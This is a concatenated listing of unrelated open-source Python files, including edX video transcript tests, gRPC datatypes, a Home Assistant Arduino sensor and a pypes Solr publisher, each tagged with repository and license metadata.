And I add a language "uk" but do not upload an .srt file
And I save changes
When I view the video language menu
Then I am not able to see the language "uk" translation language
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
language_code = 'uk'
self.video.click_button('translation_add')
translations_count = self.video.translations_count()
self.video.select_translation_language(language_code, translations_count - 1)
self.save_unit_settings()
self.assertNotIn(language_code, list(self.video.caption_languages.keys()))
def test_upload_large_transcript(self):
"""
Scenario: User can upload transcript file with > 1mb size
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "1mb_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('1mb_transcripts.srt', 'uk')
self.save_unit_settings()
self.video.wait_for(self.video.is_captions_visible, 'Captions are visible', timeout=10)
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_lines())
def test_translations_download_works_w_saving(self):
"""
Scenario: Translations downloading works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And video language menu has "uk, zh" translations
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertEqual(sorted(self.video.translations()), sorted(['zh', 'uk']))
self.assertEqual(sorted(list(self.video.caption_languages.keys())), sorted(['zh', 'uk']))
zh_unicode_text = u"好 各位同学"
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = u"Привіт, edX вітає вас."
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_download_works_wo_saving(self):
"""
Scenario: Translations downloading works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
zh_unicode_text = u"好 各位同学"
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = u"Привіт, edX вітає вас."
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_remove_works_wo_saving(self):
"""
Scenario: Translations removing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I see translations for "uk"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.assertEqual(self.video.translations(), ['uk'])
self.video.remove_translation('uk')
confirm_prompt(self.video)
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_entry_remove_works(self):
"""
Scenario: Translations entry removal works correctly when transcript is not uploaded
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click on "+ Add" button for "Transcript Languages" field
Then I click on "Remove" button
And I see newly created entry is removed
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button("translation_add")
self.assertEqual(self.video.translations_count(), 1)
self.video.remove_translation("")
self.assertEqual(self.video.translations_count(), 0)
def test_cannot_upload_sjson_translation(self):
"""
Scenario: User cannot upload translations in sjson format
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "uk" language code
And I try to upload transcript file "subs_3_yD_cEKoCk.srt.sjson"
Then I see validation error "Only SRT files can be uploaded. Please select a file ending in .srt to upload."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('uk')
self.video.upload_asset('subs_3_yD_cEKoCk.srt.sjson', asset_type='transcript')
error_msg = 'Only SRT files can be uploaded. Please select a file ending in .srt to upload.'
self.assertEqual(self.video.upload_status_message, error_msg)
def test_replace_translation_w_save(self):
"""
Scenario: User can easy replace the translation by another one w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_replace_translation_wo_save(self):
"""
Scenario: User can easy replace the translation by another one w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_translation_upload_remove_upload(self):
"""
Scenario: Upload "zh" file "A" -> Remove "zh" -> Upload "zh" file "B"
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
Then I remove translation for "zh" language code
And I upload transcript file "uk_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
confirm_prompt(self.video)
self.video.upload_translation('uk_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_select_language_twice(self):
"""
Scenario: User cannot select the same language twice
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "zh" language code
And I click button "Add"
Then I cannot choose "zh" language code
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.video.click_button('translation_add')
self.assertTrue(self.video.is_language_disabled('zh'))
def test_table_of_contents(self):
"""
Scenario: User can see Abkhazian (ab) language option at the first position
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|ab |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "table, uk" translations
And I see video language with code "table" at position "0"
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'ab')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(sorted(list(self.video.caption_languages.keys())), sorted([u'ab', u'uk']))
self.assertEqual(sorted(list(self.video.caption_languages.keys()))[0], 'ab')
def test_upload_transcript_with_BOM(self):
"""
Scenario: User can upload transcript file with BOM(Byte Order Mark) in it.
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts_with_BOM.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "莎拉·佩林 (Sarah Palin)" text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts_with_BOM.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"莎拉·佩林 (Sarah Palin)"
self.assertIn(unicode_text, self.video.captions_lines())
def test_simplified_and_traditional_chinese_transcripts_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "simplified_chinese.srt" for "zh_HANS" language code
And I save changes
Then when I view the video it does show the captions
And I see "在线学习是革" text in the captions
And I edit the component
And I open tab "Advanced"
And I upload transcript file "traditional_chinese.srt" for "zh_HANT" language code
And I save changes
Then when I view the video it does show the captions
And I see "在線學習是革" text in the captions
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
self._create_video_component()
langs_info = [
('zh_HANS', 'simplified_chinese.srt', u'在线学习是革'),
('zh_HANT', 'traditional_chinese.srt', u'在線學習是革')
]
for lang_code, lang_file, lang_text in langs_info:
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation(lang_file, lang_code)
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
# If there is only one language then there will be no subtitle/captions menu
if lang_code == u'zh_HANT':
self.video.select_language(lang_code)
unicode_text = lang_text
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
| edx-solutions/edx-platform | common/test/acceptance/tests/video/test_studio_video_editor.py | Python | agpl-3.0 | 20,547 |
# -*- coding: utf-8 -*-
{ 'sequence': 500,
"name" : "ChriCar unique View ID"
, "version" : "0.2"
, "author" : "Network Gulf IT - India"
, "website" : "http://www.chricar.at/ChriCar/index.html"
, "description" : """
This module is funded by
| ChriCar Beteiligungs- und Beratungs- GmbH
| http://www.chricar.at/ChriCar/index.html
Developed by
| Network Gulf IT - India
| http://www.networkgulf.com/
usage: get_id('your_view_name',param1,param2,param3,param4)
This function will always return the SAME unique id for a
certain combination of parameters for a view.
Hint 1: you do not need this function if the unique id can easily be
calculated during the grouping. Example:
- easy: group by product_id
- more complex: group by account_id, period_id
- very complex: group by account_id, period_id, currency_id
Hint 2: for large tables (100000 records and more) you can gain a performance factor of 10x or more
by splitting the grouping operation and the get_id call into 2 views
slow:
| select get_id(tablename,param1,param2,...), param1, param2, ... sum(field1), ...
| from
| group by get_id(tablename,param1,param2,...) ,param1,param2,...
fast:
1) view1:
| select ....
| from
| group by param1,param2,...
2) view2:
| select get_id('view1',param1,param2,...),* from view1;
| (no group by here)
"""
, "depends" : ["base"]
, "init_xml" : []
, "demo" : []
, "data" : []
, "auto_install" : False
, 'installable': False
, 'application' : False
}
| VitalPet/c2c-rd-addons | chricar_view_id/__openerp__.py | Python | agpl-3.0 | 1,460 |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Datatypes passed between Python and C code."""
import collections
import enum
@enum.unique
class Code(enum.IntEnum):
"""One Platform error codes (see status.h and codes.proto)."""
OK = 0
CANCELLED = 1
UNKNOWN = 2
INVALID_ARGUMENT = 3
EXPIRED = 4
NOT_FOUND = 5
ALREADY_EXISTS = 6
PERMISSION_DENIED = 7
UNAUTHENTICATED = 16
RESOURCE_EXHAUSTED = 8
FAILED_PRECONDITION = 9
ABORTED = 10
OUT_OF_RANGE = 11
UNIMPLEMENTED = 12
INTERNAL_ERROR = 13
UNAVAILABLE = 14
DATA_LOSS = 15
class Status(collections.namedtuple('Status', ['code', 'details'])):
"""Describes an RPC's overall status."""
class ServiceAcceptance(
collections.namedtuple(
'ServiceAcceptance', ['call', 'method', 'host', 'deadline'])):
"""Describes an RPC on the service side at the start of service."""
class Event(
collections.namedtuple(
'Event',
['kind', 'tag', 'write_accepted', 'complete_accepted',
'service_acceptance', 'bytes', 'status', 'metadata'])):
"""Describes an event emitted from a completion queue."""
@enum.unique
class Kind(enum.Enum):
"""Describes the kind of an event."""
STOP = object()
WRITE_ACCEPTED = object()
COMPLETE_ACCEPTED = object()
SERVICE_ACCEPTED = object()
READ_ACCEPTED = object()
METADATA_ACCEPTED = object()
FINISH = object()
| gameduell/kythe | third_party/grpc/src/python/src/grpc/_adapter/_datatypes.py | Python | apache-2.0 | 2,884 |
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Datasets with fake data for testing purposes.
"""
import logging
import numpy as np
from neon.datasets.dataset import Dataset
from neon.util.compat import range
logger = logging.getLogger(__name__)
class UniformRandom(Dataset):
"""
Sets up a synthetic uniformly random dataset.
Attributes:
inputs (dict): structure housing the loaded train/test/validation
input data
targets (dict): structure housing the loaded train/test/validation
target data
"""
def __init__(self, ntrain, ntest, nin, nout, **kwargs):
self.__dict__.update(kwargs)
self.ntrain = ntrain
self.ntest = ntest
self.nin = nin
self.nout = nout
self.macro_batched = False
np.random.seed(0)
def load_data(self, shape):
data = np.random.uniform(low=0.0, high=1.0, size=shape)
labels = np.random.randint(low=0, high=self.nout, size=shape[0])
onehot = np.zeros((len(labels), self.nout), dtype='float32')
for col in range(self.nout):
onehot[:, col] = (labels == col)
return (data, onehot)
def load(self, backend=None, experiment=None):
self.inputs['train'], self.targets['train'] = (
self.load_data((self.ntrain, self.nin)))
self.inputs['test'], self.targets['test'] = (
self.load_data((self.ntest, self.nin)))
self.format()
class ToyImages(Dataset):
"""
Sets up a synthetic image classification dataset.
Attributes:
inputs (dict): structure housing the loaded train/test/validation
input data
targets (dict): structure housing the loaded train/test/validation
target data
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
self.macro_batched = False
self.ntrain = 128
self.ntest = 128
self.ifmheight = 32
self.ifmwidth = self.ifmheight
self.maxrad = self.ifmwidth / 2
self.minrad = self.ifmwidth / 8
self.nifm = 3
self.nin = self.nifm * self.ifmheight * self.ifmwidth
self.nout = 2
assert self.ifmheight % 2 == 0
assert self.ifmwidth % 2 == 0
self.center = (self.ifmwidth / 2, self.ifmheight / 2)
np.random.seed(0)
def ellipse(self, canvas, xrad, yrad):
rcanvas = canvas.reshape((self.nifm, self.ifmheight, self.ifmwidth))
smooth = 10
angs = np.linspace(0, 2 * np.pi, smooth * 360)
si = np.sin(angs)
co = np.cos(angs)
xvals = np.int32(xrad * co) + self.center[0]
yvals = np.int32(yrad * si) + self.center[1]
for fm in range(self.nifm):
rcanvas[fm, xvals, yvals] = np.random.randint(256)
def circle(self, canvas, rad):
self.ellipse(canvas, rad, rad)
def load_data(self, shape):
data = np.zeros(shape, dtype='float32')
labels = np.zeros(shape[0], dtype='float32')
ncircles = shape[0] / 2
for row in range(0, ncircles):
# Make circles.
rad = np.random.randint(self.minrad, self.maxrad)
self.circle(data[row], rad)
for row in range(ncircles, shape[0]):
# Make ellipses.
while True:
xrad, yrad = np.random.randint(self.minrad, self.maxrad, 2)
if xrad != yrad:
break
self.ellipse(data[row], xrad, yrad)
labels[row] = 1
data /= 255
onehot = np.zeros((len(labels), self.nout), dtype='float32')
for col in range(self.nout):
onehot[:, col] = (labels == col)
return (data, onehot)
def load(self, backend=None, experiment=None):
ntotal = self.ntrain + self.ntest
inds = np.arange(ntotal)
np.random.shuffle(inds)
data, targets = self.load_data((ntotal, self.nin))
self.inputs['train'] = data[inds[:self.ntrain]]
self.targets['train'] = targets[inds[:self.ntrain]]
self.inputs['test'] = data[inds[self.ntrain:]]
self.targets['test'] = targets[inds[self.ntrain:]]
self.format()
| ml-lab/neon | neon/datasets/synthetic.py | Python | apache-2.0 | 4,940 |
"""Support for getting information from Arduino pins."""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.components import arduino
from homeassistant.const import CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
CONF_PINS = "pins"
CONF_TYPE = "analog"
PIN_SCHEMA = vol.Schema({vol.Required(CONF_NAME): cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS): vol.Schema({cv.positive_int: PIN_SCHEMA})}
)
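# Example configuration.yaml entry matching the schema above (the pin number and
# name are illustrative):
#
#     sensor:
#       - platform: arduino
#         pins:
#           7:
#             name: Kitchen light level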
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Arduino platform."""
if arduino.BOARD is None:
_LOGGER.error("A connection has not been made to the Arduino board")
return False
pins = config.get(CONF_PINS)
sensors = []
for pinnum, pin in pins.items():
sensors.append(ArduinoSensor(pin.get(CONF_NAME), pinnum, CONF_TYPE))
add_entities(sensors)
class ArduinoSensor(Entity):
"""Representation of an Arduino Sensor."""
def __init__(self, name, pin, pin_type):
"""Initialize the sensor."""
self._pin = pin
self._name = name
self.pin_type = pin_type
self.direction = "in"
self._value = None
arduino.BOARD.set_mode(self._pin, self.direction, self.pin_type)
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Get the name of the sensor."""
return self._name
def update(self):
"""Get the latest value from the pin."""
self._value = arduino.BOARD.get_analog_inputs()[self._pin][1]
| fbradyirl/home-assistant | homeassistant/components/arduino/sensor.py | Python | apache-2.0 | 1,767 |
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shortcut methods for getting set up with Google Cloud Storage.
You'll typically use these to get started with the API:
.. literalinclude:: snippets.py
:start-after: [START storage_get_started]
:end-before: [END storage_get_started]
The main concepts with this API are:
- :class:`~google.cloud.storage.bucket.Bucket` which represents a particular
bucket (akin to a mounted disk on a computer).
- :class:`~google.cloud.storage.blob.Blob` which represents a pointer to a
particular entity in Cloud Storage (akin to a file path on a remote
machine).
"""
from pkg_resources import get_distribution
__version__ = get_distribution("google-cloud-storage").version
from google.cloud.storage.batch import Batch
from google.cloud.storage.blob import Blob
from google.cloud.storage.bucket import Bucket
from google.cloud.storage.client import Client
__all__ = ["__version__", "Batch", "Blob", "Bucket", "Client"]
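# A minimal getting-started sketch using the classes exported above; the bucket
# name and object path are illustrative, and ambient credentials are assumed.
def _example_round_trip(bucket_name="my-example-bucket"):
    """Upload a small text object and read it back."""
    client = Client()
    bucket = client.get_bucket(bucket_name)
    blob = bucket.blob("path/to/object.txt")
    blob.upload_from_string("hello world")
    return blob.download_as_string()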
| dhermes/gcloud-python | storage/google/cloud/storage/__init__.py | Python | apache-2.0 | 1,504 |
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ambari_commons import OSCheck
from resource_management.libraries.functions import format
from resource_management.libraries.functions.default import default
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions import get_kinit_path
from resource_management.libraries.script.script import Script
# a map of the Ambari role to the component name
# for use with <stack-root>/current/<component>
SERVER_ROLE_DIRECTORY_MAP = {
'ZOOKEEPER_SERVER' : 'zookeeper-server',
'ZOOKEEPER_CLIENT' : 'zookeeper-client'
}
component_directory = Script.get_component_from_role(SERVER_ROLE_DIRECTORY_MAP, "ZOOKEEPER_CLIENT")
config = Script.get_config()
if OSCheck.is_windows_family():
zookeeper_win_service_name = "zkServer"
else:
zk_pid_dir = config['configurations']['zookeeper-env']['zk_pid_dir']
zk_pid_file = format("{zk_pid_dir}/zookeeper_server.pid")
# Security related/required params
hostname = config['hostname']
security_enabled = config['configurations']['cluster-env']['security_enabled']
kinit_path_local = get_kinit_path(default('/configurations/kerberos-env/executable_search_paths', None))
tmp_dir = Script.get_tmp_dir()
zk_user = config['configurations']['zookeeper-env']['zk_user']
stack_version_unformatted = str(config['hostLevelParams']['stack_version'])
stack_version_formatted = format_stack_version(stack_version_unformatted)
stack_root = Script.get_stack_root()
config_dir = "/etc/zookeeper/conf"
if stack_version_formatted and check_stack_feature(StackFeature.ROLLING_UPGRADE, stack_version_formatted):
config_dir = format("{stack_root}/current/{component_directory}/conf")
stack_name = default("/hostLevelParams/stack_name", None)
| arenadata/ambari | ambari-server/src/main/resources/stacks/ADH/1.0/services/ZOOKEEPER/package/scripts/status_params.py | Python | apache-2.0 | 2702 |
#!/usr/bin/python
#from openflow.optin_manager.sfa.util.sfalogging import logger
class RSpecVersion:
type = None
content_type = None
version = None
schema = None
namespace = None
extensions = {}
namespaces = dict(extensions.items() + [('default', namespace)])
elements = []
enabled = False
def __init__(self, xml=None):
self.xml = xml
def to_dict(self):
return {
'type': self.type,
'version': self.version,
'schema': self.schema,
'namespace': self.namespace,
'extensions': self.extensions.values()
}
def __str__(self):
return "%s %s" % (self.type, self.version)
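# A minimal sketch of how a concrete version could be declared by subclassing
# RSpecVersion; the type, version, schema and namespace values are illustrative.
class ExampleRSpecVersion(RSpecVersion):
    type = 'GENI'
    content_type = 'ad'
    version = '3'
    schema = 'http://www.geni.net/resources/rspec/3/ad.xsd'
    namespace = 'http://www.geni.net/resources/rspec/3'
    enabled = True
# str(ExampleRSpecVersion()) would then yield "GENI 3", and to_dict() reports
# the type, version, schema and namespace set above.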
| dana-i2cat/felix | optin_manager/src/python/openflow/optin_manager/sfa/rspecs/version.py | Python | apache-2.0 | 712 |
import httplib
import logging
#import traceback
from xml.etree.ElementTree import _escape_cdata
from pypes.component import Component
log = logging.getLogger(__name__)
class Solr(Component):
__metatype__ = 'PUBLISHER'
def __init__(self):
# initialize parent class
Component.__init__(self)
# remove the output port since this is a publisher
self.remove_output('out')
# solr host, port, and path (core)
self.set_parameter('host', 'localhost')
self.set_parameter('port', 8983)
self.set_parameter('path', '/solr')
# if we should commit after each batch
        # set commit to False if using Solr's autoCommit feature
self.set_parameter('commit', 'True', ['True', 'False'])
# wait_flush and wait_searcher
self.set_parameter('wait_flush', 'True', ['True', 'False'])
self.set_parameter('wait_searcher', 'True', ['True', 'False'])
# overwrite previously commited docs with same id
self.set_parameter('overwrite', 'True', ['True', 'False'])
# commit within time in milliseconds (0 = disabled)
self.set_parameter('commit_within', '0')
# log successful initialization message
log.info('Component Initialized: %s' % self.__class__.__name__)
def _escape(self, val):
result = None
if isinstance(val, (str, unicode)):
result = _escape_cdata(val)
else:
try:
strval = val.__str__()
except:
pass
else:
result = _escape_cdata(strval)
return result
def run(self):
# Define our components entry point
while True:
# get parameters outside doc loop for better performace
try:
host = self.get_parameter('host')
if host is None:
raise ValueError, 'Host not set'
port = self.get_parameter('port')
if port is None:
raise ValueError, 'Port not set'
else:
port = int(port)
path = self.get_parameter('path')
if path is None:
raise ValueError, 'Path not set'
commit = self.get_parameter('commit')
if commit is None:
raise ValueError, 'Commit not set'
commit_within = self.get_parameter('commit_within')
if commit_within is None:
raise ValueError, 'Commit Within not set'
wait_flush = self.get_parameter('wait_flush')
if wait_flush is None:
raise ValueError, 'Wait Flush not set'
wait_searcher = self.get_parameter('wait_searcher')
if wait_searcher is None:
raise ValueError, 'Wait Searcher not set'
overwrite = self.get_parameter('overwrite')
if overwrite is None:
raise ValueError, 'Overwrite not set'
# convert to booleans
if commit == 'True':
commit = True
else:
commit = False
if wait_flush == 'True':
wait_flush = True
else:
wait_flush = False
if wait_searcher == 'True':
wait_searcher = True
else:
wait_searcher = False
if overwrite == 'True':
overwrite = True
else:
overwrite = False
# validate commit within value
try:
commit_within = int(commit_within)
if commit_within < 0:
raise ValueError
except:
log.warn('Commit Within invalid, using default')
commit_within = 0
# strip trailing slash from path
if path.endswith('/'):
path = path[:-1]
except Exception as e:
log.error('Component Failed: %s' % self.__class__.__name__)
log.error('Reason: %s' % str(e))
self.yield_ctrl()
continue # so next time we are called we continue at the top
# for each document waiting on our input port
cnt = 0
writebuf = []
for doc in self.receive_all('in'):
cnt = cnt + 1
try:
# check for a document boost
try:
boost = float(doc.get_meta('boost'))
except:
boost = 1
writebuf.append('<doc%s>' % ( \
                        ' boost="%s"' % boost if boost > 1 else ''))
for key, vals in doc:
# see if we need to do a field boost
try:
fboost = float(doc.get_meta('boost', attr=key))
except:
fboost = 1
for val in vals:
escaped = self._escape(val)
                            if val is None or escaped is None:
log.warn('Invalid value in field %s' % key)
continue
writebuf.append('\t<field name="%s"%s>' \
'<![CDATA[%s]]></field>' % (key,
' boost="%s"' % fboost if fboost > 1 else '',
escaped))
writebuf.append('</doc>')
except Exception as e:
log.error('Component Failed: %s' % self.__class__.__name__)
log.error('Reason: %s' % str(e))
#log.error(traceback.print_exc())
# decrement the failed document
cnt = cnt - 1
# check if we have a batch of documents to submit to solr
if cnt > 0:
batch = '<add%s%s>\n%s\n</add>\n' % ( \
' overwrite="false"' if not overwrite else '',
' commitWithin="%s"' % commit_within if commit_within > 0 \
else '', '\n'.join(writebuf))
conn = None
try:
headers = {'Content-Type': 'text/xml; charset=utf-8'}
updatepth = '%s/update' % path
conn = httplib.HTTPConnection(host, port)
conn.request('POST', updatepth,
batch.encode('utf-8'), headers)
res = conn.getresponse()
if res.status != 200:
raise ValueError, res.reason
commitstr = '<commit%s%s />' % ( \
' waitFlush="false"' if not wait_flush else '',
' waitSearcher="false"' if not wait_searcher else '')
if commit:
conn.request('POST', updatepth, commitstr, headers)
# the following causes a ResponseNotReady exception
#res = conn.getresponse()
#if res.status != 200:
# raise ValueError, res.reason
except Exception as e:
log.error('Solr batch submission failed')
log.error('Reason: %s' % str(e))
#log.error(traceback.print_exc())
finally:
if conn is not None:
conn.close()
else:
log.info('No documents to submit to Solr')
# yield the CPU, allowing another component to run
self.yield_ctrl()
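# For reference, a batch assembled by run() is POSTed to <path>/update with
# roughly this shape (field names, values and commitWithin are illustrative):
#
#   <add commitWithin="10000">
#   <doc>
#       <field name="id"><![CDATA[doc-1]]></field>
#       <field name="title" boost="2.0"><![CDATA[An example title]]></field>
#   </doc>
#   </add>
#
# When the commit parameter is True, a second POST of '<commit />' follows;
# the waitFlush="false" / waitSearcher="false" attributes appear only when
# those options are disabled.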
| klyap/pypes | ui/pypesvds/plugins/solrpublisher/solrpublisher.py | Python | apache-2.0 | 8,171 |
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
# import needed classes/functions from Cocoa
from Foundation import *
from AppKit import *
# import Nib loading functionality from AppKit
from PyObjCTools import NibClassBuilder, AppHelper
from twisted.internet import _threadedselect
_threadedselect.install()
from twisted.internet import reactor, protocol
from twisted.web import http
from twisted.python import log
import sys, urlparse
